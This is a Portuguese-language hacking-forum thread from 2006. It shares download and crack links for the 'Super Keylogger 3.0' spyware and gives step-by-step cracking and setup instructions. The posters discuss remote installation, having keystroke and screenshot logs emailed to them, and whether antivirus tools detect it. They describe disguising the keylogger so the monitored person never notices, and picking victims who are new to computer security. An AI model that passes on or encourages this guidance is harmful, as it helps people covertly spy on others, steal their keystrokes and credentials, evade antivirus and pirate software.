Super Keylogger 3.0 Com Remota Instalação E Crack

Started by fffteam, 15 de July , 2006, 06:35:14 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

fffteam

Super keylogger é um kl  muito bom e vem com instalação remota,ele grava tudo que é digitado e screenshot etc.

Download:   Superkeylogger 3.0

http://www.brothersoft.com/security/key ... 40336.html

Crack:

http://www.easycracks.net/s58.html

Como Crackear O  Super Keylogger 3.0

Acesse o site easycracks.net , acima você encontrará  o crack,faça o download
e descompact o crack. 

se você ja fez o download do superkeylogger 3.0 instale o software e depois  va na
pasta onde instalou o software e renomeie o programa sklgr30 para sklgr agora copie
o crack para a pasta e subistitua o original pelo crack. Agora ele esta crackeado.

Instalação:

quando acabar de instalar vai iniciar o superkeylogger automaticamente vai aparecer
escrito numa caixa de dialogo tipo superkeylogger ou onderkeylogger é uma coisa assim ali você vai colocar um nome para acessar o programa,mas troque o nome porque fica dificel de logar se não sabe o nome certo de usuário então use um nome fácil  ex: keylogger  depois  da ok  na proxima caixa você tem de digitar um loggin para acessar o superkeylogger 3.0,escolha uma senha fácil de lembrar.

Como Acessar O SuperKeylogger 3.0

Para você acessar o Superkeylogger 3.0 se você não fechou o programa ele esta
la lista de processos com o nome sklgr.exe para acessar o loggin click com o mouse
no desktop e digite no teclado o nome de usuário
que o programa vai abrir depois é só digitar a senha para acessar a interface do programa.

Manual:

Aqui está explicado como funciona o superkeylogger, configuração etc...

Se tiverem alguma duvida postem  estou  ai para ajudar.

Abraços Valeu!!! ;D

#phobia

Hum...

Parece ser bom, vc ja testou? E melhor que o Ardamax?

Sabe se é detectado por AVG e Avast?

flw

fffteam

Ja testei e os logs chegam muito rápido é muito melhor que o ardamax

mas usem o email do gmail que não tem erro.

o meu kaspersky internet security 2006 esta detectando mas não sei como andan os outros avs

Nêmesis

fffteam

ai pessoal não importa se os avs estão detectando ou não antivirus as vezes falham,depois de bem camuflados o usuário nem irá perceber,que esta semdo monitorado,esse kl foi dificil de encontrar o crack  façam o download e mesmo que não usem guardem softwares devem ser guardados para uma possivel emergencia... etc

Nêmesis

Quote from: "fffteam"ai pessoal não importa se os avs estão detectando ou não antivirus as vezes falham,depois de bem camuflados o usuário nem irá perceber,que esta semdo monitorado,esse kl foi dificil de encontrar o crack  façam o download e mesmo que não usem guardem softwares devem ser guardados para uma possivel emergencia...

Eu entendo que foi dificil pra voce achar o serial,etc .. mais temos que analizar o keylogger tbm .. você diz que ele é melhor do que o ardamax,porem quando o server deste kl é executado,se voce ainda não reparou,os processos dele ficam visivel no gerenciador de tarefas e tbm se vc for ver a inicialização do kl esta visivel tambem !!
Sendo assim,se você for usa-lo tem que pegar uma pessoa um pouco novata com segurança do pc entende ??

mais eh isso ae cara .. vlw por ter postado este keylogger .. uma vez eu vi no invasão um monte de gente pedindo o serial dele,na época nenhum av estava pegando ele,até eu tinha baixado e fiz uns testes com avs e até eu não consegui achar o serial  :P !!

mais ta beleza cara ..

Flww

fffteam

o ardamax é um bom kl mas eu não gosto quando é feito o download dos logs
para visualizalos você tem que colocar os logs em uma pasta,visualizar um e depois apagar e copiar outro log para a pasta para ver novamente um outro log,é complicado perde-se muito tempo para visualizar muitos logs,mas é um bom kl.

Nêmesis

Quote from: "fffteam"o ardamax é um bom kl mas eu não gosto quando é feito o download dos logs
para visualizalos você tem que colocar os logs em uma pasta,visualizar um e depois apagar e copiar outro log para a pasta para ver novamente um outro log,é complicado perde-se muito tempo para visualizar muitos logs,mas é um bom kl.

Certo .. fffteam mais agora na sua nova versão ele tem a opção de visualizar diretamente no email !!!
HTML(Web Page)

Flw

Anonymous

Blz de tutorial,eu ja quebrei muito a cabeça pra configura-lo!
Voce ajudou e muito!
Valeu!